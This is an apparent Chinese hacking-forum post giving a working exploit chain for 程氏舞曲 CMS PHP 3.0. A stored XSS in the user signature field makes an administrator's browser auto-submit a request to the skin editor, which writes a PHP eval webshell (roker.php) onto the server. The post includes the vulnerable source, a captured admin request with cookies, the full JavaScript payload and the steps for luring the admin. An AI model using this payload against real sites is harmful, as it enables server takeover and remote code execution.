程氏舞曲CMSPHP3.0 储存型xss getshell
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
官网已经修补了,所以重新下了源码
因为 后台登入 还需要认证码 所以 注入就没看了。
存在 xss
漏洞文件 user/member/skin_edit.php
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
</textarea></td></tr>
user/do.php
if($op=='zl'){ //资料
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
where CS_Name='".$cscms_name."'";
if($db->query($sql)){
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
}else{
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
}
没有 过滤导致xss产生。
后台 看了下 很奇葩的是可以写任意格式文件。。
抓包。。
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是 构造js如下。
本帖隐藏的内容<script>
thisTHost = top.location.hostname;
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
function PostSubmit(url, data, msg) {
var postUrl = url;
var postData = data;
var msgData = msg;
var ExportForm = document.createElement("FORM");
document.body.appendChild(ExportForm);
ExportForm.method = "POST";
var newElement = document.createElement("input");
newElement.setAttribute("name", "name");
newElement.setAttribute("type", "hidden");
var newElement2 = document.createElement("input");
newElement2.setAttribute("name", "content");
newElement2.setAttribute("type", "hidden");
ExportForm.appendChild(newElement);
ExportForm.appendChild(newElement2);
newElement.value = postData;
newElement2.value = msgData;
ExportForm.action = postUrl;
ExportForm.submit();
};
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST);?>");
</script>
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
用你的账号给管理写个 私信 或者让他访问你的主页http://127.0.0.1/home/?uid=2(uid自己改)
就会 在 skins\index\html\目录下生成 roker.php 一句话。
页:
[1]